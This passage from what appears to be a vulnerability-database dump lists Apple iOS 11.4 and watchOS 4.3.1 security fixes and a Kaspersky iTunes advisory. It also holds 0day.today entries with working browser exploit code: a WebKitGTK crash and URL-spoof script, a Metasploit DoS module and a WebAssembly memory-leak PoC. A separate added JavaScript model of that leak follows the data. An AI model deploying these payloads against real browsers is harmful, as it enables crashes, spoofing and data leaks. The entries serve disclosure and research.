encrypted Mail. 
This issue was addressed with improved isolation of MIME in Mail.\n\nCVE-2018-4227: Damian Poddebniak of M\u00fcnster University of Applied Sciences, Christian Dresen of M\u00fcnster University of Applied Sciences, Jens M\u00fcller of Ruhr University Bochum, Fabian Ising of M\u00fcnster University of Applied Sciences, Sebastian Schinzel of M\u00fcnster University of Applied Sciences, Simon Friedberger of KU Leuven, Juraj Somorovsky of Ruhr University Bochum, J\u00f6rg Schwenk of Ruhr University Bochum\n\n**Messages**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: A local user may be able to conduct impersonation attacks\n\nDescription: An injection issue was addressed with improved input validation.\n\nCVE-2018-4235: Anurodh Pokharel of Salesforce.com\n\n**Messages**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: Processing a maliciously crafted message may lead to a denial of service\n\nDescription: This issue was addressed with improved message validation.\n\nCVE-2018-4240: Sriram (@Sri_Hxor) of PrimeFort Pvt. Ltd\n\nCVE-2018-4250: Metehan Y\u0131lmaz of Sesim Sarpkaya\n\n**Safari**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: A malicious website may be able to cause a denial of service\n\nDescription: A denial of service issue was addressed with improved validation.\n\nCVE-2018-4247: Fran\u00e7ois Renaud, Jesse Viviano of Verizon Enterprise Solutions\n\n**Security**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: Users may be tracked by malicious websites using client certificates\n\nDescription: An issue existed in the handling of S-MIME certificates. 
This issue was addressed with improved validation of S-MIME certificates.\n\nCVE-2018-4221: Damian Poddebniak of M\u00fcnster University of Applied Sciences, Christian Dresen of M\u00fcnster University of Applied Sciences, Jens M\u00fcller of Ruhr University Bochum, Fabian Ising of M\u00fcnster University of Applied Sciences, Sebastian Schinzel of M\u00fcnster University of Applied Sciences, Simon Friedberger of KU Leuven, Juraj Somorovsky of Ruhr University Bochum, J\u00f6rg Schwenk of Ruhr University Bochum\n\n**Security**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: A local user may be able to read a persistent account identifier\n\nDescription: An authorization issue was addressed with improved state management.\n\nCVE-2018-4223: Abraham Masri (@cheesecakeufo)\n\n**Security**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: A local user may be able to read a persistent device identifier\n\nDescription: An authorization issue was addressed with improved state management.\n\nCVE-2018-4224: Abraham Masri (@cheesecakeufo)\n\n**Security**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: A local user may be able to modify the state of the Keychain\n\nDescription: An authorization issue was addressed with improved state management.\n\nCVE-2018-4225: Abraham Masri (@cheesecakeufo)\n\n**Security**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: A local user may be able to view sensitive user information\n\nDescription: An authorization issue was addressed with improved state management.\n\nCVE-2018-4226: Abraham Masri (@cheesecakeufo)\n\n**Siri**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: A person with physical access to an iOS device may be able to enable Siri from the lock screen\n\nDescription: An issue 
existed with Siri permissions. This was addressed with improved permission checking.\n\nCVE-2018-4238: Baljinder Singh, Muhammad khizer javed, Onur Can BIKMAZ (@CanBkmaz) of Mustafa Kemal University\n\n**Siri**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: A person with physical access to an iOS device may be able to use Siri to read notifications of content that is set not to be displayed at the lock screen\n\nDescription: An issue existed with Siri permissions. This was addressed with improved permission checking.\n\nCVE-2018-4252: Hunter Byrnes, Martin Winkelmann (@Winkelmannnn)\n\n**Siri Contacts**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: An attacker with physical access to a device may be able to see private contact information\n\nDescription: An issue existed with Siri permissions. This was addressed with improved permission checking.\n\nCVE-2018-4244: an anonymous researcher\n\n**UIKit**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: Processing a maliciously crafted text file may lead to a denial of service\n\nDescription: A validation issue existed in the handling of text. 
This issue was addressed with improved validation of text.\n\nCVE-2018-4198: Hunter Byrnes\n\n**WebKit**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: Visiting a malicious website may lead to address bar spoofing\n\nDescription: An inconsistent user interface issue was addressed with improved state management.\n\nCVE-2018-4188: YoKo Kho (@YoKoAcc) of Mitra Integrasi Informatika, PT\n\n**WebKit**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed with improved memory handling.\n\nCVE-2018-4201: an anonymous researcher\n\nCVE-2018-4218: Natalie Silvanovich of Google Project Zero\n\nCVE-2018-4233: Samuel Gro\u00df (@5aelo) working with Trend Micro\u2019s Zero Day Initiative\n\n**WebKit**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: A buffer overflow issue was addressed with improved memory handling.\n\nCVE-2018-4199: Alex Plaskett, Georgi Geshev, and Fabi Beterke of MWR Labs working with Trend Micro\u2019s Zero Day Initiative\n\nEntry updated June 14, 2018\n\n**WebKit**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: Visiting a maliciously crafted website may lead to cookies being overwritten\n\nDescription: A permissions issue existed in the handling of web browser cookies. 
This issue was addressed with improved restrictions.\n\nCVE-2018-4232: an anonymous researcher, Aymeric Chaib\n\n**WebKit**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: A race condition was addressed with improved locking.\n\nCVE-2018-4192: Markus Gaasedelen, Amy Burnett, and Patrick Biernat of Ret2 Systems, Inc working with Trend Micro\u2019s Zero Day Initiative\n\nEntry updated October 8, 2019\n\n**WebKit**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: Processing maliciously crafted web content may lead to an unexpected Safari crash\n\nDescription: A memory corruption issue was addressed with improved input validation.\n\nCVE-2018-4214: found by OSS-Fuzz\n\n**WebKit**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2018-4204: found by OSS-Fuzz, Richard Zhu (fluorescence) working with Trend Micro's Zero Day Initiative\n\n**WebKit**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: A type confusion issue was addressed with improved memory handling.\n\nCVE-2018-4246: found by OSS-Fuzz\n\n**WebKit**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: Visiting a maliciously crafted website may leak sensitive data\n\nDescription: Credentials were unexpectedly sent when fetching CSS mask images. 
This was addressed by using a CORS-enabled fetch method.\n\nCVE-2018-4190: Jun Kokatsu (@shhnjk)\n\n**WebKit**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: An out-of-bounds read was addressed with improved input validation.\n\nCVE-2018-4222: Natalie Silvanovich of Google Project Zero\n", "edition": 2, "modified": "2019-10-08T03:21:43", "published": "2019-10-08T03:21:43", "id": "APPLE:HT208848", "href": "https://support.apple.com/kb/HT208848", "title": "About the security content of iOS 11.4 - Apple Support", "type": "apple", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-24T20:41:19", "bulletinFamily": "software", "cvelist": ["CVE-2018-4211", "CVE-2018-4223", "CVE-2018-4225", "CVE-2018-4194", "CVE-2018-4187", "CVE-2018-4224", "CVE-2018-4404", "CVE-2018-4233", "CVE-2018-4241", "CVE-2018-4198", "CVE-2018-4237", "CVE-2018-4222", "CVE-2018-4192", "CVE-2018-4235", "CVE-2018-4201", "CVE-2018-4206", "CVE-2018-4218", "CVE-2018-4246", "CVE-2018-4249", "CVE-2018-4214", "CVE-2018-4240", "CVE-2018-5383", "CVE-2018-4243", "CVE-2018-4226"], "description": "## About Apple security updates\n\nFor our customers' protection, Apple doesn't disclose, discuss, or confirm security issues until an investigation has occurred and patches or releases are available. Recent releases are listed on the [Apple security updates](<https://support.apple.com/kb/HT201222>) page.\n\nFor more information about security, see the [Apple Product Security](<https://support.apple.com/kb/HT201220>) page. 
You can encrypt communications with Apple using the [Apple Product Security PGP Key](<https://support.apple.com/kb/HT201601>).\n\nApple security documents reference vulnerabilities by [CVE-ID](<http://cve.mitre.org/about/>) when possible.\n\n\n\n## watchOS 4.3.1\n\nReleased May 29, 2018\n\n**Bluetooth**\n\nNot impacted: Apple Watch Series 3\n\nImpact: An attacker in a privileged network position may be able to intercept Bluetooth traffic\n\nCVE-2018-5383: Lior Neumann and Eli Biham\n\nEntry added July 23, 2018\n\n**CoreGraphics**\n\nAvailable for: All Apple Watch models\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: An out-of-bounds read was addressed with improved input validation.\n\nCVE-2018-4194: Jihui Lu of Tencent KeenLab, Yu Zhou of Ant-financial Light-Year Security Lab\n\nEntry added June 21, 2018\n\n**Crash Reporter**\n\nAvailable for: All Apple Watch models\n\nImpact: An application may be able to gain elevated privileges\n\nDescription: A memory corruption issue was addressed with improved error handling.\n\nCVE-2018-4206: Ian Beer of Google Project Zero\n\n**FontParser**\n\nAvailable for: All Apple Watch models\n\nImpact: Processing a maliciously crafted font file may lead to arbitrary code execution\n\nDescription: A memory corruption issue was addressed with improved validation.\n\nCVE-2018-4211: Proteas of Qihoo 360 Nirvan Team\n\n**Kernel**\n\nAvailable for: All Apple Watch models\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A buffer overflow was addressed with improved bounds checking.\n\nCVE-2018-4241: Ian Beer of Google Project Zero\n\nCVE-2018-4243: Ian Beer of Google Project Zero\n\n**Kernel**\n\nAvailable for: All Apple Watch models\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2018-4249: Kevin 
Backhouse of Semmle Ltd.\n\n**libxpc**\n\nAvailable for: All Apple Watch models\n\nImpact: An application may be able to gain elevated privileges\n\nDescription: A logic issue was addressed with improved validation.\n\nCVE-2018-4237: Samuel Gro\u00df (@5aelo) working with Trend Micro\u2019s Zero Day Initiative\n\n**libxpc**\n\nAvailable for: All Apple Watch models\n\nImpact: An application may be able to execute arbitrary code with system privileges\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2018-4404: Samuel Gro\u00df (@5aelo) working with Trend Micro\u2019s Zero Day Initiative\n\nEntry added August 1, 2019\n\n**LinkPresentation**\n\nAvailable for: All Apple Watch models\n\nImpact: Processing a maliciously crafted text message may lead to UI spoofing\n\nDescription: A spoofing issue existed in the handling of URLs. This issue was addressed with improved input validation.\n\nCVE-2018-4187: Roman Mueller (@faker_), Zhiyang Zeng (@Wester) of Tencent Security Platform Department\n\nEntry added August 1, 2019\n\n**Messages**\n\nAvailable for: All Apple Watch models\n\nImpact: A local user may be able to conduct impersonation attacks\n\nDescription: An injection issue was addressed with improved input validation.\n\nCVE-2018-4235: Anurodh Pokharel of Salesforce.com\n\n**Messages**\n\nAvailable for: All Apple Watch models\n\nImpact: Processing a maliciously crafted message may lead to a denial of service\n\nDescription: This issue was addressed with improved message validation.\n\nCVE-2018-4240: Sriram (@Sri_Hxor) of PrimeFort Pvt. 
Ltd\n\n**Security**\n\nAvailable for: All Apple Watch models\n\nImpact: A local user may be able to read a persistent device identifier\n\nDescription: An authorization issue was addressed with improved state management.\n\nCVE-2018-4224: Abraham Masri (@cheesecakeufo)\n\n**Security**\n\nAvailable for: All Apple Watch models\n\nImpact: A local user may be able to modify the state of the Keychain\n\nDescription: An authorization issue was addressed with improved state management.\n\nCVE-2018-4225: Abraham Masri (@cheesecakeufo)\n\n**Security**\n\nAvailable for: All Apple Watch models\n\nImpact: A local user may be able to read a persistent account identifier\n\nDescription: An authorization issue was addressed with improved state management.\n\nCVE-2018-4223: Abraham Masri (@cheesecakeufo)\n\n**Security**\n\nAvailable for: All Apple Watch models\n\nImpact: A local user may be able to view sensitive user information\n\nDescription: An authorization issue was addressed with improved state management.\n\nCVE-2018-4226: Abraham Masri (@cheesecakeufo)\n\n**UIKit**\n\nAvailable for: All Apple Watch models\n\nImpact: Processing a maliciously crafted text file may lead to a denial of service\n\nDescription: A validation issue existed in the handling of text. 
This issue was addressed with improved validation of text.\n\nCVE-2018-4198: Hunter Byrnes\n\n**WebKit**\n\nAvailable for: All Apple Watch models\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: A race condition was addressed with improved locking.\n\nCVE-2018-4192: Markus Gaasedelen, Amy Burnett, and Patrick Biernat of Ret2 Systems, Inc working with Trend Micro\u2019s Zero Day Initiative\n\nEntry updated October 8, 2019\n\n**WebKit**\n\nAvailable for: All Apple Watch models\n\nImpact: Processing maliciously crafted web content may lead to an unexpected Safari crash\n\nDescription: A memory corruption issue was addressed with improved input validation.\n\nCVE-2018-4214: found by OSS-Fuzz\n\n**WebKit**\n\nAvailable for: All Apple Watch models\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: A type confusion issue was addressed with improved memory handling.\n\nCVE-2018-4246: found by OSS-Fuzz\n\n**WebKit**\n\nAvailable for: All Apple Watch models\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed with improved memory handling.\n\nCVE-2018-4201: an anonymous researcher\n\nCVE-2018-4218: Natalie Silvanovich of Google Project Zero\n\nCVE-2018-4233: Samuel Gro\u00df (@5aelo) working with Trend Micro\u2019s Zero Day Initiative\n\n**WebKit**\n\nAvailable for: All Apple Watch models\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: An out-of-bounds read was addressed with improved input validation.\n\nCVE-2018-4222: Natalie Silvanovich of Google Project Zero\n", "edition": 2, "modified": "2019-10-08T03:38:09", "published": "2019-10-08T03:38:09", "id": "APPLE:HT208851", "href": "https://support.apple.com/kb/HT208851", "title": "About the security content of watchOS 4.3.1 - Apple Support", "type": 
"apple", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "kaspersky": [{"lastseen": "2020-09-02T11:41:39", "bulletinFamily": "info", "cvelist": ["CVE-2018-4225", "CVE-2018-4194", "CVE-2018-4188", "CVE-2018-4199", "CVE-2018-4224", "CVE-2018-4190", "CVE-2018-4233", "CVE-2018-4222", "CVE-2018-4192", "CVE-2018-4204", "CVE-2018-4201", "CVE-2018-4218", "CVE-2018-4246", "CVE-2018-4214", "CVE-2018-4232", "CVE-2018-4200", "CVE-2018-4226"], "description": "### *Detect date*:\n05/29/2018\n\n### *Severity*:\nCritical\n\n### *Description*:\nMultiple serious vulnerabilities have been found in Apple iTunes. Malicious users can exploit these vulnerabilities to execute arbitrary code, spoof the user interface and obtain sensitive information.\n\n### *Affected products*:\nApple iTunes earlier than 12.7.5\n\n### *Solution*:\nUpdate to the latest version \n[Download iTunes](<https://www.apple.com/itunes/download/>)\n\n### *Original advisories*:\n[About the security content of iTunes 12.7.5 for Windows](<https://support.apple.com/en-us/HT208852>) \n\n\n### *Impacts*:\nACE \n\n### *Related products*:\n[Apple iTunes](<https://threats.kaspersky.com/en/product/Apple-iTunes/>)\n\n### *CVE-IDS* (CVSS score / severity):\n[CVE-2018-4194](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-4194>) 0.0 Unknown \n[CVE-2018-4218](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-4218>) 6.8 High \n[CVE-2018-4246](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-4246>) 6.8 High \n[CVE-2018-4222](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-4222>) 6.8 High \n[CVE-2018-4224](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-4224>) 2.1 Warning \n[CVE-2018-4225](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-4225>) 2.1 Warning \n[CVE-2018-4226](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-4226>) 2.1 Warning \n[CVE-2018-4232](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-4232>) 4.3 Warning 
\n[CVE-2018-4233](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-4233>) 6.8 High \n[CVE-2018-4188](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-4188>) 4.3 Warning \n[CVE-2018-4190](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-4190>) 4.3 Warning \n[CVE-2018-4192](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-4192>) 5.1 High \n[CVE-2018-4199](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-4199>) 6.8 High \n[CVE-2018-4200](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-4200>) 6.8 High \n[CVE-2018-4201](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-4201>) 6.8 High \n[CVE-2018-4204](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-4204>) 6.8 High \n[CVE-2018-4214](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-4214>) 6.8 High\n\n### *Exploitation*:\nThe following public exploits exist for this vulnerability:", "edition": 37, "modified": "2020-06-18T00:00:00", "published": "2018-05-29T00:00:00", "id": "KLA11282", "href": "https://threats.kaspersky.com/en/vulnerability/KLA11282", "title": "KLA11282: Multiple vulnerabilities in Apple iTunes", "type": "kaspersky", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "zdt": [{"lastseen": "2018-06-06T21:48:57", "description": "webkitFaviconDatabaseSetIconForPageURL and webkitFaviconDatabaseSetIconURLForPageURL in UIProcess/API/glib/WebKitFaviconDatabase.cpp in WebKit, as used in WebKitGTK+ through 2.21.3, mishandle an unset pageURL, leading to an application crash.", "edition": 1, "published": "2018-06-06T00:00:00", "title": "WebKitGTK+ < 2.21.3 - pageURL Mishandling Crash (PoC) Exploit", "type": "zdt", "bulletinFamily": "exploit", "cvelist": ["CVE-2018-11646"], "modified": "2018-06-06T00:00:00", "id": "1337DAY-ID-30538", "href": "https://0day.today/exploit/description/30538", "sourceData": "# Title: WebKitGTK+ < 2.21.3 - Crash (PoC) \r\n# Author: Dhiraj Mishra\r\n# Software: https://webkitgtk.org/\r\n# CVE: CVE-2018-11646\r\n# 
Summary:\r\n# webkitFaviconDatabaseSetIconForPageURL and webkitFaviconDatabaseSetIconURLForPageURL in \r\n# UIProcess/API/glib/WebKitFaviconDatabase.cpp in WebKit, as used in WebKitGTK+ through 2.21.3, \r\n# mishandle an unset pageURL, leading to an application crash. CVE-2018-11646 was assigned to this issue.\r\n \r\n# PoC:\r\n \r\n<script>\r\nwin = window.open(\"sleep_one_second.php\", \"WIN\"); \r\nwindow.open(\"https://www.paypal.com\", \"WIN\"); \r\nwin.document.execCommand('Stop'); \r\nwin.document.write(\"Spoofed URL\"); \r\nwin.document.close();\r\n</script>\r\n \r\n \r\nBacktrace using Fedora 27:\r\n \r\n#0 WTF::StringImpl::rawHash\r\nat /usr/src/debug/webkitgtk4-2.18.0-2.fc27.x86_64/Source/WTF/wtf/text/StringImpl.h line 508\r\n#1 WTF::StringImpl::hasHash\r\nat /usr/src/debug/webkitgtk4-2.18.0-2.fc27.x86_64/Source/WTF/wtf/text/StringImpl.h line 514\r\n#2 WTF::StringImpl::hash\r\nat /usr/src/debug/webkitgtk4-2.18.0-2.fc27.x86_64/Source/WTF/wtf/text/StringImpl.h line 525\r\n#3 WTF::StringHash::hash\r\nat /usr/src/debug/webkitgtk4-2.18.0-2.fc27.x86_64/Source/WTF/wtf/text/StringHash.h line 73\r\n#9 WTF::HashMap, WTF::HashTraits >::get\r\nat /usr/src/debug/webkitgtk4-2.18.0-2.fc27.x86_64/Source/WTF/wtf/HashMap.h line 406\r\n#10 webkitFaviconDatabaseSetIconURLForPageURL\r\nat /usr/src/debug/webkitgtk4-2.18.0-2.fc27.x86_64/Source/WebKit/UIProcess/API/glib/WebKitFaviconDatabase.cpp line 193\r\n#11 webkitFaviconDatabaseSetIconForPageURL\r\nat /usr/src/debug/webkitgtk4-2.18.0-2.fc27.x86_64/Source/WebKit/UIProcess/API/glib/WebKitFaviconDatabase.cpp line 318\r\n#12 webkitWebViewSetIcon\r\nat /usr/src/debug/webkitgtk4-2.18.0-2.fc27.x86_64/Source/WebKit/UIProcess/API/glib/WebKitWebView.cpp line 1964\r\n#13 WTF::Function::performCallbackWithReturnValue\r\nat /usr/src/debug/webkitgtk4-2.18.0-2.fc27.x86_64/Source/WebKit/UIProcess/GenericCallback.h line 108\r\n#15 WebKit::WebPageProxy::dataCallback\r\nat 
/usr/src/debug/webkitgtk4-2.18.0-2.fc27.x86_64/Source/WebKit/UIProcess/WebPageProxy.cpp line 5083\r\n#16 WebKit::WebPageProxy::finishedLoadingIcon\r\nat /usr/src/debug/webkitgtk4-2.18.0-2.fc27.x86_64/Source/WebKit/UIProcess/WebPageProxy.cpp line 6848\r\n#17 IPC::callMemberFunctionImpl::operator()\r\nat /usr/src/debug/webkitgtk4-2.18.0-2.fc27.x86_64/Source/WTF/wtf/glib/RunLoopGLib.cpp line 68\r\n#29 WTF::RunLoop::::_FUN(gpointer)\r\nat /usr/src/debug/webkitgtk4-2.18.0-2.fc27.x86_64/Source/WTF/wtf/glib/RunLoopGLib.cpp line 70\r\n#30 g_main_dispatch\r\nat gmain.c line 3148\r\n#31 g_main_context_dispatch\r\nat gmain.c line 3813\r\n#32 g_main_context_iterate\r\nat gmain.c line 3886\r\n#33 g_main_context_iteration\r\nat gmain.c line 3947x\r\n#34 g_application_run\r\nat gapplication.c line 2401\r\n#35 main\r\nat ../src/ephy-main.c line 432 \r\n \r\n \r\n# References:\r\n# https://bugs.webkit.org/show_bug.cgi?id=186164\r\n# https://bugzilla.gnome.org/show_bug.cgi?id=795740\n\n# 0day.today [2018-06-06] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/30538"}, {"lastseen": "2018-06-12T00:51:24", "description": "Exploit for linux platform in category dos / poc", "edition": 1, "published": "2018-06-11T00:00:00", "title": "WebKitGTK+ < 2.21.3 - #WebKitFaviconDatabase DoS Exploit", "type": "zdt", "bulletinFamily": "exploit", "cvelist": ["CVE-2018-11646"], "modified": "2018-06-11T00:00:00", "id": "1337DAY-ID-30569", "href": "https://0day.today/exploit/description/30569", "sourceData": "##\r\n# Title: WebKitGTK+ < 2.21.3 - 'WebKitFaviconDatabase' DoS\r\n# Author: Dhiraj Mishra\r\n# Date: 2018-06-11\r\n# CVE: 2018-11646\r\n#\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n \r\nclass MetasploitModule < Msf::Auxiliary\r\n include Msf::Exploit::Remote::HttpServer\r\n \r\n def initialize(info = {})\r\n super(\r\n update_info(\r\n info,\r\n 'Name' => 
\"WebKitGTK+ WebKitFaviconDatabase DoS\",\r\n 'Description' => %q(\r\n This module exploits a vulnerability in WebKitFaviconDatabase when pageURL is unset.\r\n If successful, it could lead to application crash, resulting in denial of service.\r\n ),\r\n 'License' => MSF_LICENSE,\r\n 'Author' => [\r\n 'Dhiraj Mishra', # Original discovery, disclosure\r\n 'Hardik Mehta', # Original discovery, disclosure\r\n 'Zubin Devnani', # Original discovery, disclosure\r\n 'Manuel Caballero' #JS Code\r\n ],\r\n 'References' => [\r\n ['EDB', '44842'],\r\n ['CVE', '2018-11646'],\r\n ['URL', 'https://bugs.webkit.org/show_bug.cgi?id=186164'],\r\n ['URL', 'https://datarift.blogspot.com/2018/06/cve-2018-11646-webkit.html']\r\n ],\r\n 'DisclosureDate' => 'Jun 03 2018',\r\n 'Actions' => [[ 'WebServer' ]],\r\n 'PassiveActions' => [ 'WebServer' ],\r\n 'DefaultAction' => 'WebServer'\r\n )\r\n )\r\n end\r\n \r\n def run\r\n exploit # start http server\r\n end\r\n \r\n def setup\r\n @html = <<-JS\r\n<script type=\"text/javascript\">\r\n win = window.open(\"WIN\", \"WIN\");\r\n window.open(\"http://example.com/\", \"WIN\");\r\n win.document.execCommand('stop');\r\n win.document.write(\"HelloWorld\");\r\n win.document.close();\r\n</script>\r\n JS\r\n end\r\n \r\n def on_request_uri(cli, _request)\r\n print_status('Sending response')\r\n send_response(cli, @html)\r\n end\r\nend\n\n# 0day.today [2018-06-11] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/30569"}, {"lastseen": "2018-06-10T01:35:03", "description": "Exploit for multiple platform in category dos / poc", "edition": 1, "published": "2018-06-09T00:00:00", "title": "WebKit - WebAssembly Compilation Info Leak Exploit", "type": "zdt", "bulletinFamily": "exploit", "cvelist": ["CVE-2018-4222"], "modified": "2018-06-09T00:00:00", "id": "1337DAY-ID-30560", "href": "https://0day.today/exploit/description/30560", "sourceData": "<!--\r\nThere is an out-of-bounds read when compiling WebAssembly source 
buffers in WebKit. When a source buffer is compiled, it is first copied into a read-only buffer by the function getWasmBufferFromValue. This function returns the code buffer as follows:\r\n \r\nreturn arrayBufferView ? static_cast<uint8_t*>(arrayBufferView->vector()) : static_cast<uint8_t*>(arrayBuffer->impl()->data());\r\n \r\nIf the source buffer is a view (DataView or TypedArray), arrayBufferView->vector() is returned. The vector() method returns the start of the data in the buffer, including any offset. However, the function createSourceBufferFromValue copies the output of this function as follows:\r\n \r\nmemcpy(result.data(), data + byteOffset, byteSize);\r\n \r\nThis means that if the buffer is a view, the offset is added to the buffer twice before this is copied. This could allow memory off the heap to be read out of the source buffer, either through parsing exceptions or data sections when they are copied. A minimal PoC for the issue is:\r\n \r\nvar b2 = new ArrayBuffer(1000);\r\nvar view = new Int8Array(b2, 700);\r\nvar mod = new WebAssembly.Module(view);\r\n \r\nAn HTML file that consistently crashes Safari is attached.\r\n-->\r\n \r\n<html><body><script>\r\nfor(var q = 0; q < 100; q++){\r\nvar i = Math.random();\r\ni = Math.round(i*0x20000000);\r\ni = Math.abs(i);\r\nvar b2 = new Uint8Array( i);\r\nconsole.log(\"i\" + i);\r\nvar j = Math.random();\r\nj = j*i;\r\nj = Math.round(j);\r\nj = Math.abs(j);\r\nconsole.log(\"j\"+j)\r\nvar view2 = new DataView(b2.buffer,j);\r\ntry{\r\nvar mod = new WebAssembly.Module(view2);\r\n}catch(e){\r\nconsole.log(e);\r\n}\r\n}\r\n</script></body></html>\n\n# 0day.today [2018-06-10] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/30560"}, {"lastseen": "2018-06-10T01:35:18", "description": "Exploit for multiple platform in category dos / poc", "edition": 1, "published": "2018-06-09T00:00:00", "title": "WebKit - Use-After-Free when Resuming Generator Exploit", "type": "zdt", 
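Added example (mine, not code from the 0day.today entry, from Project Zero or from WebKit): a JavaScript model of the double-offset copy described in the CVE-2018-4222 entry above, with the corrected arithmetic beside it. The heap layout, the 1000-byte source buffer filled with 0x41, the 0x53 neighbour bytes and every function name here are constructed for this demonstration and are not WebKit identifiers.

```javascript
'use strict';

// Constructed layout: a 1000-byte ArrayBuffer holding WebAssembly source bytes (0x41),
// immediately followed by 1000 bytes of unrelated allocation data (0x53) that the page
// owning the source buffer must never be able to read.
const BUFFER_BYTES = 1000;
const SOURCE_BYTE = 0x41;
const NEIGHBOUR_BYTE = 0x53;

function makeHeap() {
  const heap = new Uint8Array(2 * BUFFER_BYTES);
  heap.fill(SOURCE_BYTE, 0, BUFFER_BYTES);
  heap.fill(NEIGHBOUR_BYTE, BUFFER_BYTES);
  return heap;
}

// The bytes the compiler would parse for a view created as DataView(buffer, viewOffset)
// covering viewLength bytes. fixed=false reproduces the bug: vector() already points at
// the view's data start (offset applied once), and the copy applies byteOffset again.
function copyWasmSource(heap, viewOffset, viewLength, { fixed }) {
  if (viewOffset < 0 || viewLength < 0 || viewOffset + viewLength > BUFFER_BYTES) {
    // The view itself must fit its buffer; this is what the DataView constructor enforces.
    throw new RangeError('view does not fit inside its ArrayBuffer');
  }
  const dataStart = viewOffset;                                 // arrayBufferView->vector()
  const start = fixed ? dataStart : dataStart + viewOffset;     // memcpy(..., data + byteOffset, ...)
  return heap.slice(start, start + viewLength);
}

// How many bytes of a copy came from outside the source buffer.
function countLeaked(copy) {
  let n = 0;
  for (const b of copy) if (b === NEIGHBOUR_BYTE) n++;
  return n;
}

// Smallest view offset at which the buggy range [2*off, 2*off + len) leaves the buffer.
// The random (i, j) loop in the PoC above is searching for offsets at or past this point.
function minLeakingOffset(bufferBytes, viewLength) {
  return Math.floor((bufferBytes - viewLength) / 2) + 1;
}

// Stand-alone run with the numbers from the minimal PoC (1000-byte buffer, view at 700).
const demoHeap = makeHeap();
console.log('buggy copy leaks', countLeaked(copyWasmSource(demoHeap, 700, 300, { fixed: false })), 'bytes');
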